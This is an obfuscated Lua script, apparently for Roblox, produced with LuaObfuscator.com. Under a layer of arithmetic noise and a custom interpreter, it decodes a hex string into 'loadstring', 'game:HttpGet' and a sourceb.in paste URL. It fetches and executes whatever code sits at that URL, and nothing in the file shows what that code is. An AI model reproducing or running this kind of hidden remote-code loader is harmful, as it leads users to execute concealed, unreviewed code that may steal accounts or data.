--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v126=v5(v88,v19);v19=nil;return v126;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=927 -(214 + 713) ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((1 + 1)^(v32-(2 -(4 -3)))))%(2^(((v33-((995 -(32 + 85)) -((1552 -(226 + 1044)) + 595))) -(v32-1)) + (1638 -(1523 + 114)))) ;return v90-(v90%(1 -0)) ;end end else local v91=(4 -2)^(v32-(620 -(555 + 63 + 1))) ;return (((v31%(v91 + v91))>=v91) and (932 -(857 + 74))) or ((126 + 442) -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (959 -(892 + 65)) ;return (v36 * (469 -213)) + v35 ;end local function v23() local v37=350 -(87 + 263) ;local v38;local v39;local v40;local v41;while true do if (v37==(952 -((2270 -1468) + 150))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (6 -2) ;v37=1 + 0 ;end if (v37==(1 + 0 + 0)) then return (v41 * 16777216) + (v40 * (160901 -95365)) + (v39 * (189 + 67)) + v38 ;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -2)) then v45=860 -(814 + 45) ;v46=(v20(v44,(2685 -1497) -((2482 -(447 + 966)) + 118) ,45 -25 ) * (((8 -5) -1)^(12 + 20))) + v43 ;v42=1 + 1 ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -(368 + 423) );v48=((v20(v44,1849 -(1703 + 114) )==(1081 -(1020 + 60))) and  -(3 -2)) or (19 -(10 + (709 -(376 + 325)))) ;v42=11 -8 ;end if (v42==3) then if (v47==(442 -(416 + (42 -16)))) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v127=(0 -0) -(0 + 0) ;while true do if (v127==(1913 -((3939 -2150) + 124))) then v47=439 -(145 + 293) ;v45=430 -(44 + 386) ;break;end end end elseif (v47==(3533 -((1012 -(9 + 5)) + 488))) then return ((v46==(0 + 0)) and (v48 * ((3 -2)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1795 -(201 + 571)) ) * (v45 + (v46/((2 + 0)^(1190 -(116 + 1022))))) ;end if (v42==(0 -(376 -(85 + 291)))) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1265 -(243 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v68=1, #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if ((0 -0)~=v92) then else local v122=(function() return 1636 -(1373 + 263) ;end)();while true do if (v122~=0) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v122=(function() return 1;end)();end if ((1001 -(451 + 549))==v122) then v92=(function() return  #"<";end)();break;end end end if (v92~= #".") then else if (v93== #".") then v95=(function() return v94()~=(0 + 0) ;end)();elseif (v93==2) then v95=(function() return v96();end)();elseif (v93== #"xnx") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v53=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if (v109==0) then local v124=(function() return 0 -0 ;end)();while true do if (v124~=0) then else v100=(function() return 0;end)();v101=(function() return nil;end)();v124=(function() return 1;end)();end if (v124==(1 -0)) then v109=(function() return 1385 -(746 + 638) ;end)();break;end end end if (v109==(1 + 0)) then local v125=(function() return 0;end)();while true do if (v125~=(0 -0)) then else local v128=(function() return 341 -(218 + 123) ;end)();while true do if (v128~=(1581 -(1535 + 46))) then else while true do if (v100==(0 + 0)) then v101=(function() return v102();end)();if (v103(v101, #"|", #",")==0) then local v178=(function() return 0;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();while true do if (v178==0) then local v184=(function() return 0;end)();while true do if (v184~=1) then else v178=(function() return 1;end)();break;end if (0==v184) then v179=(function() return v103(v101,1 + 1 , #"gha");end)();v180=(function() return v103(v101, #".com",566 -(306 + 254) );end)();v184=(function() return 1 + 0 ;end)();end end end if (v178~=(5 -2)) then else if (v103(v180, #"-19", #"gha")== #"<") then v181[ #"http"]=(function() return v106[v181[ #"xnxx"]];end)();end v107[v108]=(function() return v181;end)();break;end if (v178==2) then if (v103(v180, #"}", #"]")~= #"[") then else v181[1469 -(899 + 568) ]=(function() return v106[v181[2 + 0 ]];end)();end if (v103(v180,4 -2 ,605 -(268 + 335) )~= #"/") then else v181[ #"asd"]=(function() return v106[v181[ #"19("]];end)();end v178=(function() return 3;end)();end if (v178==1) then local v186=(function() return 0;end)();while true do if (v186==(290 -(60 + 230))) then local v190=(function() return 0;end)();while true do if (v190==(572 -(426 + 146))) then v181=(function() return {v104(),v104(),nil,nil};end)();if (v179==(1456 -(282 + 1174))) then local v191=(function() return 811 -(569 + 242) ;end)();local v192=(function() return;end)();while true do if (v191==(0 -0)) then v192=(function() return 0;end)();while true do if (v192==(0 + 0)) then v181[ #"-19"]=(function() return v104();end)();v181[ #"0313"]=(function() return v104();end)();break;end end break;end end elseif (v179== #"\\") then v181[ #"91("]=(function() return v105();end)();elseif (v179==2) then v181[ #"19("]=(function() return v105() -(2^16) ;end)();elseif (v179== #"-19") then local v197=(function() return 1024 -(706 + 318) ;end)();local v198=(function() return;end)();while true do if (v197==0) then v198=(function() return 1251 -(721 + 530) ;end)();while true do if (v198~=0) then else v181[ #"xxx"]=(function() return v105() -((1273 -(945 + 326))^(39 -23)) ;end)();v181[ #"xnxx"]=(function() return v104();end)();break;end end break;end end end v190=(function() return 1;end)();end if ((1 + 0)~=v190) then else v186=(function() return 701 -(271 + 429) ;end)();break;end end end if (v186~=(1 + 0)) then else v178=(function() return 1502 -(1408 + 92) ;end)();break;end end end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end end end end end;end)();local v54=(function() return function(v110,v111,v112) local v113=(function() return 1086 -(461 + 625) ;end)();local v114=(function() return;end)();while true do if (v113==(1288 -(993 + 295))) then v114=(function() return 0;end)();while true do if (v114==0) then local v129=(function() return 0 + 0 ;end)();while true do if (v129==(1171 -(418 + 753))) then v110[v111-#"/" ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #":",v59 do FlatIdent_43862,Type,v21,Cons,v24,v25,v60,v70=(function() return v52(FlatIdent_43862,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"xxx"]=(function() return v21();end)();for v71= #".",v23() do FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v60,v55,v71=(function() return v53(FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v60,v55,v71);end)();end for v72= #":",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 + 0 ];local v66=v62[1 + 1 ];local v67=v62[1 + 0 + 2 ];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=1 + 0 ;local v78= -(530 -(406 + 123));local v79={};local v80={...};local v81=v12("#",...) -1 ;local v82={};local v83={};for v115=0 + 0 ,v81 do if ((1284<3151) and (v115>=v75)) then v79[v115-v75 ]=v80[v115 + (1323 -(1249 + 73)) ];else v83[v115]=v80[v115 + 1 + 0 + 0 ];end end local v84=(v81-v75) + (1146 -(466 + 679)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[2 -1 ];if ((v86<=(19 -12)) or (1850==1529)) then if (v86<=(1903 -(106 + 1794))) then if (v86<=(1 + 0)) then if (v86==((0 -0) + 0)) then v83[v85[5 -3 ]]();else local v130=0;local v131;while true do if (v130==(0 -0)) then v131=v85[116 -(4 + 110) ];v83[v131]=v83[v131](v13(v83,v131 + (585 -(57 + 527)) ,v78));break;end end end elseif (v86>(1429 -(41 + 1386))) then local v132=v85[(292 -187) -(17 + (192 -106)) ];local v133,v134=v76(v83[v132](v13(v83,v132 + 1 + 0 ,v85[6 -3 ])));v78=(v134 + v132) -((1 + 1) -(4 -3)) ;local v135=166 -(122 + 44) ;for v160=v132,v78 do v135=v135 + (1 -0) ;v83[v160]=v133[v135];end else do return;end end elseif (v86<=(16 -11)) then if ((821<2123) and (v86>(4 + (753 -(239 + 514))))) then do return;end else v83[v85[1 + 1 ]]=v64[v85[5 -2 ]];end elseif (v86==(71 -(30 + 35))) then v83[v85[2 + 0 ]]=v85[1260 -(1043 + 214) ];else local v140=0 -0 ;local v141;local v142;while true do if (v140==((427 + 786) -(323 + 889))) then v83[v141 + (2 -1) ]=v142;v83[v141]=v142[v85[1333 -(797 + 532) ]];break;end if ((902<2325) and (v140==0)) then v141=v85[582 -(361 + 160 + 59) ];v142=v83[v85[(109 + 214) -(53 + 267) ]];v140=1 + 0 ;end end end elseif (v86<=11) then if (v86<=(422 -(15 + 398))) then if (v86>(990 -(18 + 964))) then local v143=v85[4 -2 ];v83[v143]=v83[v143](v13(v83,v143 + (1203 -(373 + 829)) ,v78));else v83[v85[7 -5 ]]=v64[v85[2 + 1 ]];end elseif ((858<=2962) and (v86>(7 + 3))) then v83[v85[852 -(20 + 830) ]]={};else v83[v85[2]]={};end elseif (v86<=(11 + (733 -(476 + 255)))) then if (v86>(138 -(116 + 10))) then v83[v85[1 + 1 ]]();else v83[v85[740 -(542 + 196) ]]=v85[3];end elseif (v86>(29 -15)) then local v151=0 + 0 ;local v152;local v153;local v154;local v155;while true do if ((0 + 0)==v151) then v152=v85[1 + 1 ];v153,v154=v76(v83[v152](v13(v83,v152 + (2 -1) ,v85[3])));v151=1;end if ((4 -2)==v151) then for v176=v152,v78 do local v177=1551 -(1126 + (1555 -(369 + 761))) ;while true do if ((405 -(69 + 49 + 287))==v177) then v155=v155 + (3 -2) ;v83[v176]=v153[v155];break;end end end break;end if ((v151==(1122 -(118 + 1003))) or (3946<1288)) then v78=(v154 + v152) -(2 -1) ;v155=0;v151=(687 -308) -(142 + 235) ;end end else local v156=0 -0 ;local v157;local v158;while true do if ((0==v156) or (3242==567)) then v157=v85[1 + 1 ];v158=v83[v85[980 -(553 + 424) ]];v156=1;end if (((1 -0)==v156) or (847>=1263)) then v83[v157 + 1 ]=v158;v83[v157]=v158[v85[4 + 0 ]];break;end end end v77=v77 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5873586F623468424D6D2F3000094Q000B7Q001208000100013Q001208000200023Q002007000200020003001206000400044Q0003000200044Q000900013Q00022Q000D0001000100012Q00053Q00017Q00",v9(),...);
